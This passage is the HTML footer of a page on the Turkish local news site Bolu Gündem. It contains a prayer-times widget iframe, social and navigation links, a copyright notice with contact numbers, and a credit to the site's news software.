width="300" height="90" scrolling="no" src="http://haberciniz.biz/service/prayer/index.php?p=14"></iframe></div><div class="side_cat_news"></div></div></div></div><div class="base_outer"><div class="base_bottom base_position"><div class="social"><a href="https://www.facebook.com/bolugundem" style="background-position: left -168px;" target="_blank" title="Facebook ile paylaş"></a><a href="http://www.bolugundem.com/rss/" style="background-position: left -144px;" target="_blank" title="RSS, News Feed, Haber Beslemesi"></a></div><ul class="nav"><li class="parent"><a href="http://www.bolugundem.com//" target="_self">Ana Sayfa</a></li><li class="sep">|</li><li class="parent"><a href="http://www.bolugundem.com/identity.php" target="_self">Künye</a></li><li class="sep">|</li><li class="parent"><a href="http://www.bolugundem.com/contact.php" target="_self">İletişim</a></li><li class="sep">|</li><li class="parent"><a href="#" target="_self" onclick="addToBookmark('Bolu Gündem', 'http://www.bolugundem.com/'); return false;">Sık Kullanılanlara Ekle</a></li><li class="sep">|</li><li class="parent"><a href="http://www.bolugundem.com/rss/" target="_self">RSS</a></li><li class="sep">|</li><li class="parent"><a href="http://www.bolugundem.com/guncel-haberleri-144hk.htm" target="_self">Güncel</a></li></ul><div class="info"><strong>Tüm Hakları Saklıdır &copy; 1989 Bolu Gündem Gazetesi</strong> | İzinsiz ve kaynak gösterilmeden yayınlanamaz.<br />Tel : (0.374) 217 66 66 | Faks : (0.374) 218 21 21 | <a href="http://www.cmbilisim.com/haber-portali-20s.htm" target="_blank" title="CMNews Haber Portalı Yazılımı">Haber Yazılımı</a>: <a href="http://www.cmbilisim.com/" target="_blank" title="CM Bilişim Teknolojileri">CM Bilişim</a></div></div></div><!-- 0.011584043502808 --></div><script type="text/javascript">showLogin("", "", "", "")</script></body></html>